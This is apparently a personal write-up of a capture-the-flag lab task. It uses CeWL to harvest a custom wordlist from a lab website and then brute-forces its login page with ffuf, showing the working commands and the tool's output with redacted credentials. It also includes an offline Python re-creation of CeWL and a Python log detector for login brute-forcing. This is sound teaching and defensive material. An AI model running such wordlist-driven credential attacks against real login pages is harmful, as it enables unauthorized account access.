The fourth day of AoC23 also contains a Brute Forcing task, like yesterday.
We are tasked with testing if a hacker got access using a customised wordlist, like CeWL.
Learning Objectives #
- What is CeWL?
- What are the capabilities of CeWL?
- How can we leverage CeWL to generate a custom wordlist from a website?
- How can we customise the tool’s output for a specific task?
Overview #
These are my key takeaways from today:
- CeWL is a custom wordlist generator that spiders websites and creates a wordlist based on the site’s content.
- Very valuable for pentesters aiming to brute-force login pages or find hidden directories using organisation-specific terminology.
- CeWL can also compile a list of email addresses or usernames identified in team members’ page links.
CeWL #
$ cewl -h shows the help.
$ cewl http://10.10.80.47 -w outfile.lst spiders the site and writes the generated wordlist to outfile.lst.
CeWL stands out from other tools since it creates custom wordlists based on a website and its content. Here is why:
- Target-specific wordlists: Craft specialised wordlists based on the victim’s website.
- Depth of search: Can spider a website to a specific depth.
- Customisable outputs: Provides options to fine-tune the wordlist, like setting a minimum word length, removing numbers etc.
- Built-in features: Can also find author meta tags (for username enumeration) and email extraction.
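To make the capabilities above concrete, here is a small Python re-implementation of the idea behind CeWL. This is an added example written for this write-up, not CeWL’s own code: it spiders a site to a given depth, pulls words out of the visible HTML text, applies the equivalents of the minimum-length (-m), --lowercase and --with-numbers options, and collects e-mail addresses on the way. The pages it crawls are a constructed in-memory site standing in for the target; every hostname, page and name in it is an assumption.

```python
"""Toy re-implementation of what CeWL does (added example, not CeWL's code):
spider a site to a given depth, extract words from the HTML, and apply the
equivalents of -m (minimum word length), --lowercase and --with-numbers,
while also collecting e-mail addresses. Pages come from an in-memory dict
constructed below, so it runs offline."""
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample site (hypothetical content standing in for the target).
SITE = {
    "http://example.test/": """<html><head><title>Frostlings Security</title>
        <meta name="author" content="webadmin"></head>
        <body><h1>Welcome to Frostlings Security 2023</h1>
        <p>Our Antarctica team builds CyberDefence products.</p>
        <a href="/team.php">Meet the team</a> <a href="/about.html">About</a>
        <script>var tracking = "should-not-become-a-word";</script></body></html>""",
    "http://example.test/team.php": """<html><body><h2>Team</h2>
        <p>Alice Frost (alice@example.test) and Bob Penguin (bob@example.test)</p>
        <a href="/">Home</a></body></html>""",
    "http://example.test/about.html": """<html><body>
        <p>Founded in 2023 by Frostlings Security.</p></body></html>""",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


class PageParser(HTMLParser):
    """Collect visible text and links; ignore <script>/<style> bodies."""

    def __init__(self):
        super().__init__()
        self.text, self.links = [], []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a":
            self.links += [v for k, v in attrs if k == "href" and v]

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def crawl(start, depth):
    """Breadth-first spider restricted to the start host (like cewl -d N)."""
    host = urlparse(start).netloc
    seen, queue, pages = set(), [(start, 0)], []
    while queue:
        url, d = queue.pop(0)
        if url in seen or url not in SITE:  # SITE stands in for an HTTP fetch
            continue
        seen.add(url)
        parser = PageParser()
        parser.feed(SITE[url])
        pages.append(parser)
        if d < depth:
            for link in parser.links:
                target = urljoin(url, link)
                if urlparse(target).netloc == host:
                    queue.append((target, d + 1))
    return pages


def generate_wordlist(start, depth=2, min_len=3, lowercase=False, with_numbers=False):
    """Return (words ordered by frequency, sorted e-mail addresses)."""
    word_re = re.compile(r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+")
    counts, emails = Counter(), set()
    for page in crawl(start, depth):
        text = " ".join(page.text)
        emails.update(EMAIL_RE.findall(text))
        for w in word_re.findall(text):
            if len(w) >= min_len:
                counts[w.lower() if lowercase else w] += 1
    return [w for w, _ in counts.most_common()], sorted(emails)


if __name__ == "__main__":
    words, emails = generate_wordlist("http://example.test/", depth=2, min_len=5, lowercase=True)
    print("\n".join(words))
    print(emails)
```

The two filters in the write-up map directly onto the parameters: depth=0 on the team page only harvests names from that single page, while depth=2 with with_numbers=True keeps tokens such as years, which is what the -d 2 and --with-numbers flags do in the real tool. Script and style bodies are skipped so that JavaScript identifiers do not pollute the list.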
I had some problems when trying to run CeWL: either it didn’t save anything to the file or it said it couldn’t open the file for writing.
I solved it by just adding a redirect after the command and then removing the first line of the file.
$ cewl http://10.10.80.47 > pws.lst
I also had a lot of problems getting wfuzz to work, so I used ffuf with a saved request from Burp Suite instead…
Questions #
- What is the correct username and password combination?
Using the following commands and tools to get the answer:
$ cewl -d 2 -m 5 http://10.10.80.47 --with-numbers > pws.lst
$ cewl -d 0 -m 5 http://10.10.80.47/team.php --lowercase > usr.lst
# Saved a request from burpsuite to login.req
$ ffuf -request login.req -request-proto http -mode clusterbomb -w usr.lst:USERFUZZ -w pws.lst:PASSFUZZ -fs 4478
[ffuf ASCII banner]
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.80.47/login.php
:: Wordlist : USERFUZZ: /home/eplots/thm/aoc23/usr.lst
:: Wordlist : PASSFUZZ: /home/eplots/thm/aoc23/pws.lst
:: Header : Host: 10.10.80.47
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Connection: close
:: Header : Cookie: PHPSESSID=tmg3e766pgjb3j80ohrflqg1b9
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: http://10.10.80.47
:: Header : Referer: http://10.10.80.47/login.php
:: Header : Upgrade-Insecure-Requests: 1
:: Data : username=USERFUZZ&password=PASSFUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4478
________________________________________________
[Status: 302, Size: 4442, Words: 1241, Lines: 119, Duration: 45ms]
* PASSFUZZ: [redacted]
* USERFUZZ: [redacted]
:: Progress: [9361/9361] :: Job [1/1] :: 392 req/sec :: Duration: [0:00:27] :: Errors: 0 ::
- What is the flag?
Simply read the “Confidential Message” in the webmail after logging in.
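From the defender’s side, the ffuf run above has a distinctive shape in the web server logs: thousands of POSTs to /login.php from one source in under half a minute, every failure the same size, then a single 302. The following Python is an added example (not part of the original write-up, nor code from ffuf or CeWL) that detects that pattern in combined-format access logs. The log lines are constructed here to mimic the run; the IP addresses, timestamps, sizes and thresholds are assumptions.

```python
"""Detection for the login brute-force pattern shown by the ffuf run above
(added example; the log lines are constructed, not taken from the target).
Flags any source IP that POSTs to the login endpoint more than THRESHOLD
times within a sliding WINDOW, and records how many failures preceded the
first successful (redirect) login from that source."""
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta, timezone

Rec = namedtuple("Rec", "ip ts method path status size")

# Apache/nginx combined log format: ip ident user [ts] "METHOD path proto" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+)"
)


def parse(line):
    """Parse one access-log line; return None if it does not match the format."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return Rec(m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"]), int(m["size"]))


def build_sample_log():
    """Constructed access log: one source hammering /login.php (failures are
    HTTP 200 with the constant-size login page, the hit is a 302), plus a
    benign user who logs in on the first try. Addresses are made up."""
    base = datetime(2023, 12, 4, 10, 0, 0, tzinfo=timezone.utc)
    lines = []

    def entry(ip, t, method, path, status, size):
        stamp = t.strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} {size} "-" "ffuf"')

    entry("10.0.0.9", base, "GET", "/login.php", 200, 4478)
    entry("10.0.0.9", base + timedelta(seconds=30), "POST", "/login.php", 302, 4442)
    for i in range(30):  # 30 failed guesses in roughly ten seconds from one source
        entry("10.0.0.5", base + timedelta(milliseconds=350 * i), "POST", "/login.php", 200, 4478)
    entry("10.0.0.5", base + timedelta(seconds=11), "POST", "/login.php", 302, 4442)
    entry("10.0.0.5", base + timedelta(seconds=12), "GET", "/index.php", 200, 9000)
    return lines


def detect_login_bruteforce(lines, login_path="/login.php", success_status=302,
                            threshold=20, window=timedelta(seconds=60)):
    """Return {ip: finding} for sources exceeding `threshold` login POSTs in any `window`."""
    per_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec.method == "POST" and rec.path == login_path:
            per_ip[rec.ip].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r.ts)
        # Largest number of login POSTs inside any sliding window (two-pointer scan).
        best, start = 0, 0
        for end in range(len(recs)):
            while recs[end].ts - recs[start].ts > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        # How many non-redirect attempts came before the first redirect (successful login)?
        failures_before_success, fails = None, 0
        for r in recs:
            if r.status == success_status:
                failures_before_success = fails
                break
            fails += 1
        findings[ip] = {"attempts": len(recs), "max_in_window": best,
                        "failures_before_success": failures_before_success}
    return findings


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(build_sample_log()).items():
        print(ip, info)
```

A finding whose failures_before_success is a number rather than None is the case that matters most: the guessing burst ended in a valid session, so the account needs a password reset and session invalidation, not just a block on the source address. The constant 4478-byte failure page that the -fs filter relies on is equally useful to the defender, since every failed login is trivially countable by size alone.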